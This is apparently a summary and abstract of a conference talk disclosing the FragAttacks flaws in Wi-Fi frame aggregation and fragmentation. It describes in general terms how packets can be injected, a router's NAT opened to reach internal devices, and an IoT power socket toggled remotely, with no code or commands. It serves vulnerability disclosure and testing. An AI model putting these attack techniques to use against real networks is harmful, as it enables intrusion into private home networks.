FragAttacks: Breaking Wi-Fi through Fragmentation and Aggregation

The presentation discusses design and implementation flaws in Wi-Fi networks that allow for easy injection of plaintext packets and remote control of devices, as well as the root causes and potential solutions for these vulnerabilities.

• Design flaws in Wi-Fi networks allow for easy injection of plaintext packets and remote control of devices
• Implementation flaws in Wi-Fi networks allow for easy injection of plaintext packets and remote control of devices
• Root causes and potential solutions for these vulnerabilities are discussed

The presenter demonstrates how the cloaked amsdu flaw can be used to inject packets towards a router, allowing an attacker to connect with other devices in the victim's home network. They also show how an implementation flaw can be used to remotely turn on and off a power socket without knowing the password of the Wi-Fi network.

This presentation introduces three novel security-related design flaws in Wi-Fi and various widespread implementation flaws. An adversary can abuse these to inject packets or exfiltrate selected frames. As an example, it will be demonstrated how packet injection can be used to punch a hole in the router's NAT so the adversary can connect to and exploit internal devices in the network (e.g. BlueKeep against Windows 7).The first design flaw is present in Wi-Fi's frame aggregation feature where a flag in the Wi-Fi header is not properly protected. The other two design flaws are present in Wi-Fi's frame fragmentation feature where the receiver improperly verifies and manages fragments. Although these design flaws can be non-trivial to exploit, they affect all protected Wi-Fi networks. Some design flaws even affect the ancient WEP protocol meaning these flaws have been part of Wi-Fi since 1997.In practice, the implementation vulnerabilities are the most concerning. Several are widespread and trivial to exploit. For example, some devices accept plaintext frames in a protected Wi-Fi network and others accept plaintext aggregated frames that resemble handshake messages. The resulting attacks will be demonstrated, such as turning an IoT power socket on and off, and a tool will be released that can be used to test Wi-Fi products against all the discovered vulnerabilities.